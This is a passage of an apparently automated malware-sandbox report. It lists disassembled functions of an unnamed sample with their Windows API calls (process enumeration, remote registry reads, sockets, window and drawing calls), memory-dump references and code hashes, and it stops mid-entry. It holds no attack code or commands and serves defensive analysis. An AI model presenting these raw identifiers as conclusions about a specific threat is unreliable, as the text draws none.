                                                                                                                                        • API ID: _memmove$__itow__swprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3253778849-0
                                                                                                                                        • Opcode ID: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                                                                                                                        • Instruction ID: 304023f3941bfa40323994a042602852fff117905d4efec4aeceeb25fd1605ef
                                                                                                                                        • Opcode Fuzzy Hash: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                                                                                                                        • Instruction Fuzzy Hash: 0161BE3090025ADBCF05EF64CD8AEFE37A4AF86314F048654FD5A6B192DB389D15CBA1
                                                                                                                                        Function 007C1AD0 Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 007C1B09
                                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 007C1B17
                                                                                                                                        • __wsplitpath.LIBCMT ref: 007C1B45
                                                                                                                                          • Part of subcall function 0078297D: __wsplitpath_helper.LIBCMT ref: 007829BD
                                                                                                                                        • _wcscat.LIBCMT ref: 007C1B5A
                                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 007C1BD0
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 007C1BE2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1380811348-0
                                                                                                                                        • Opcode ID: 0253a4a6ef49b9f9820cf1802a6f49ae4b53407082c2bb83b92649d918cae3b5
                                                                                                                                        • Instruction ID: 00aa768ea8ed2a7ebba1b9786fb5288f28ae8c36c02fc6354f6ffce90101b342
                                                                                                                                        • Opcode Fuzzy Hash: 0253a4a6ef49b9f9820cf1802a6f49ae4b53407082c2bb83b92649d918cae3b5
                                                                                                                                        • Instruction Fuzzy Hash: 895161715043409FD720EF24C889EABB7ECEF89754F40491DF98A97251EB34E905CBA2
                                                                                                                                        Function 007C2EC7 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                          • Part of subcall function 007C3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007C2AA6,?,?), ref: 007C3B0E
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007C2FA0
                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007C2FE0
                                                                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007C3003
                                                                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007C302C
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 007C306F
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 007C307C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4046560759-0
                                                                                                                                        • Opcode ID: 56ba98ef27ea23b21cb0405b85d0ec01f84939b7671d154a5dcf3c50c5721914
                                                                                                                                        • Instruction ID: 351ca8b75e293e80725e82c6f0cd6aa9c6b4a52a450c44f42b1f7b7f4b99931c
                                                                                                                                        • Opcode Fuzzy Hash: 56ba98ef27ea23b21cb0405b85d0ec01f84939b7671d154a5dcf3c50c5721914
                                                                                                                                        • Instruction Fuzzy Hash: 37514B31204204EFC714EF64C889E6EB7E9FF89314F04891DF996872A1DB79EA05CB52
                                                                                                                                        Function 0077DB8C Relevance: 9.2, APIs: 6, Instructions: 160COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscpy$_wcscat
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2037614760-0
                                                                                                                                        • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                                        • Instruction ID: b1f3313396e8151cd3af64a56f9a3b8b41522a45e9c5616ffbc8fc55a411801a
                                                                                                                                        • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                                        • Instruction Fuzzy Hash: 1051CF70904115EECF32AF98C4419BDB3B5EF04790F94805AF589AB291DBBC6E82D7A1
                                                                                                                                        Function 007A2ADC Relevance: 9.2, APIs: 6, Instructions: 158COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 007A2AF6
                                                                                                                                        • VariantClear.OLEAUT32(00000013), ref: 007A2B68
                                                                                                                                        • VariantClear.OLEAUT32(00000000), ref: 007A2BC3
                                                                                                                                        • _memmove.LIBCMT ref: 007A2BED
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 007A2C3A
                                                                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007A2C68
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1101466143-0
                                                                                                                                        • Opcode ID: 4e87767fd5e2473753a5c18f5dc229faa892a33a4dfe723e303150cee9926bf7
                                                                                                                                        • Instruction ID: 1b847185241781c1c8b8e0a486d5ed1f1e19c7b3373ba33e8a9c3782ac1d6a34
                                                                                                                                        • Opcode Fuzzy Hash: 4e87767fd5e2473753a5c18f5dc229faa892a33a4dfe723e303150cee9926bf7
                                                                                                                                        • Instruction Fuzzy Hash: C5518EB5A00209EFCB14CF58C884AAAB7B8FF8D314B158559ED49DB341E334E942CFA0
                                                                                                                                        Function 007C82DB Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetMenu.USER32(?), ref: 007C833D
                                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 007C8374
                                                                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007C839C
                                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 007C840B
                                                                                                                                        • GetSubMenu.USER32(?,?), ref: 007C8419
                                                                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 007C846A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$Item$CountMessagePostString
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 650687236-0
                                                                                                                                        • Opcode ID: 9287b69fb09540224ef7e70bf7c55f5fa63810dc3f3a99806a4a6c680e956bef
                                                                                                                                        • Instruction ID: 48f85c1700da8b57824434499fb2ccb35eb246bd72391435efc32d463ebb8d22
                                                                                                                                        • Opcode Fuzzy Hash: 9287b69fb09540224ef7e70bf7c55f5fa63810dc3f3a99806a4a6c680e956bef
                                                                                                                                        • Instruction Fuzzy Hash: BC51BE71A00259EFCF55EF64C885AAEBBB4EF48710F14805DE816BB351CB38AE418B91
                                                                                                                                        Function 007B936F Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 007B9409
                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 007B9416
                                                                                                                                        • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 007B943A
                                                                                                                                        • _strlen.LIBCMT ref: 007B9484
                                                                                                                                        • _memmove.LIBCMT ref: 007B94CA
                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 007B94F7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$_memmove_strlenselect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2795762555-0
                                                                                                                                        • Opcode ID: a21654bfd685f74b1278739a366ce3fa0f453e86535a4932a50bc9cf1a4d52d1
                                                                                                                                        • Instruction ID: 70197bb25e9d7453222e393a731afc989503bae721fdb7865ec9313a71e472dd
                                                                                                                                        • Opcode Fuzzy Hash: a21654bfd685f74b1278739a366ce3fa0f453e86535a4932a50bc9cf1a4d52d1
                                                                                                                                        • Instruction Fuzzy Hash: 8D414275500144EFCB14EBA4CD99BEEB7B9EF48310F208259F61697291DB38AE41CB60
                                                                                                                                        Function 007A54E0 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 007A552E
                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007A5579
                                                                                                                                        • IsMenu.USER32(00000000), ref: 007A5599
                                                                                                                                        • CreatePopupMenu.USER32 ref: 007A55CD
                                                                                                                                        • GetMenuItemCount.USER32(000000FF), ref: 007A562B
                                                                                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 007A565C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3311875123-0
                                                                                                                                        • Opcode ID: c42663ad71cbe53948c7af3d6ff2cfd45011d5a3fc3c0b1edfff8efe7a23191d
                                                                                                                                        • Instruction ID: 3bf80b49a24ba269729810ad203cfb4ab0daffc9c7433cc488606933381946dc
                                                                                                                                        • Opcode Fuzzy Hash: c42663ad71cbe53948c7af3d6ff2cfd45011d5a3fc3c0b1edfff8efe7a23191d
                                                                                                                                        • Instruction Fuzzy Hash: FE51D170A00A49EFDF20CF68C888BADBBF5BF96718F544319E4159B291D3789D44CB51
                                                                                                                                        Function 0077B18C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 0077B1C1
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0077B225
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 0077B242
                                                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0077B253
                                                                                                                                        • EndPaint.USER32(?,?), ref: 0077B29D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1827037458-0
                                                                                                                                        • Opcode ID: 0ea4a05d3538d66bd16f851470d9b224a79aea47a70e4596b17415f64bad1a01
                                                                                                                                        • Instruction ID: 541cae33232d19180b70facadbf0a1a79d43980c328ff72cc6e28bd12b765c69
                                                                                                                                        • Opcode Fuzzy Hash: 0ea4a05d3538d66bd16f851470d9b224a79aea47a70e4596b17415f64bad1a01
                                                                                                                                        • Instruction Fuzzy Hash: B241A170101200DFCB21DF24DCC8F6A7BF8FB59360F148579F999862A2C7399C459B61
                                                                                                                                        Function 007CE1A7 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ShowWindow.USER32(00821810,00000000,?,?,00821810,00821810,?,007DE2D6), ref: 007CE21B
                                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 007CE23F
                                                                                                                                        • ShowWindow.USER32(00821810,00000000,?,?,00821810,00821810,?,007DE2D6), ref: 007CE29F
                                                                                                                                        • ShowWindow.USER32(?,00000004,?,?,00821810,00821810,?,007DE2D6), ref: 007CE2B1
                                                                                                                                        • EnableWindow.USER32(?,00000001), ref: 007CE2D5
                                                                                                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 007CE2F8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 642888154-0
                                                                                                                                        • Opcode ID: 794454e48c77426d44083e4ed54a033d08b1a8fafd877386ef662c58250249cd
                                                                                                                                        • Instruction ID: 4711b3d4578d3b705f07dd347bf9a488b34f0e66bdb63cc50047ee81048e1f89
                                                                                                                                        • Opcode Fuzzy Hash: 794454e48c77426d44083e4ed54a033d08b1a8fafd877386ef662c58250249cd
                                                                                                                                        • Instruction Fuzzy Hash: 6E416E35601941EFDB26CF24C499F947BE5BF0A314F1881BDEA588F2A2C779A841CB51
                                                                                                                                        Function 007B1BFA Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 308COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007684A6: __swprintf.LIBCMT ref: 007684E5
                                                                                                                                          • Part of subcall function 007684A6: __itow.LIBCMT ref: 00768519
                                                                                                                                          • Part of subcall function 00763BCF: _wcscpy.LIBCMT ref: 00763BF2
                                                                                                                                        • _wcstok.LIBCMT ref: 007B1D6E
                                                                                                                                        • _wcscpy.LIBCMT ref: 007B1DFD
                                                                                                                                        • _memset.LIBCMT ref: 007B1E30
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                        • String ID: X
                                                                                                                                        • API String ID: 774024439-3081909835
                                                                                                                                        • Opcode ID: 507548e5a7f66f679863ac29582fad02004ccc42b9b346bb789bfebb00ef81ea
                                                                                                                                        • Instruction ID: d71d0612f700fc537b38e7f613945462f583a9c59aa1f8c0943a68ebf9fa5ce7
                                                                                                                                        • Opcode Fuzzy Hash: 507548e5a7f66f679863ac29582fad02004ccc42b9b346bb789bfebb00ef81ea
                                                                                                                                        • Instruction Fuzzy Hash: C3C17371608341DFC714EF24C895AAAB7E4FF85310F44492DF89A972A2DB38ED45CB92
                                                                                                                                        Function 007CE9C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0077B5EB
                                                                                                                                          • Part of subcall function 0077B58B: SelectObject.GDI32(?,00000000), ref: 0077B5FA
                                                                                                                                          • Part of subcall function 0077B58B: BeginPath.GDI32(?), ref: 0077B611
                                                                                                                                          • Part of subcall function 0077B58B: SelectObject.GDI32(?,00000000), ref: 0077B63B
                                                                                                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 007CE9F2
                                                                                                                                        • LineTo.GDI32(00000000,00000003,?), ref: 007CEA06
                                                                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007CEA14
                                                                                                                                        • LineTo.GDI32(00000000,00000000,?), ref: 007CEA24
                                                                                                                                        • EndPath.GDI32(00000000), ref: 007CEA34
                                                                                                                                        • StrokePath.GDI32(00000000), ref: 007CEA44
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 43455801-0
                                                                                                                                        • Opcode ID: 27f24c222b282cbd68797221b61aeb9d7e89dc72191dbc964fe68639aa6447ac
                                                                                                                                        • Instruction ID: d3f45533ec3994903390d42f8f0ec1a6e91939fc808741f96b8c8fe07e5e26b4
                                                                                                                                        • Opcode Fuzzy Hash: 27f24c222b282cbd68797221b61aeb9d7e89dc72191dbc964fe68639aa6447ac
                                                                                                                                        • Instruction Fuzzy Hash: 5311B77600014DBFDF229F90DC88EAA7FADEB08364F14C025FE1959160D7759D569BA0
                                                                                                                                        Function 0079EF91 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(00000000), ref: 0079EFB6
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0079EFC7
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0079EFCE
                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0079EFD6
                                                                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0079EFED
                                                                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0079EFFF
                                                                                                                                          • Part of subcall function 0079A83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,0079A79D,00000000,00000000,?,0079AB73), ref: 0079B2CA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
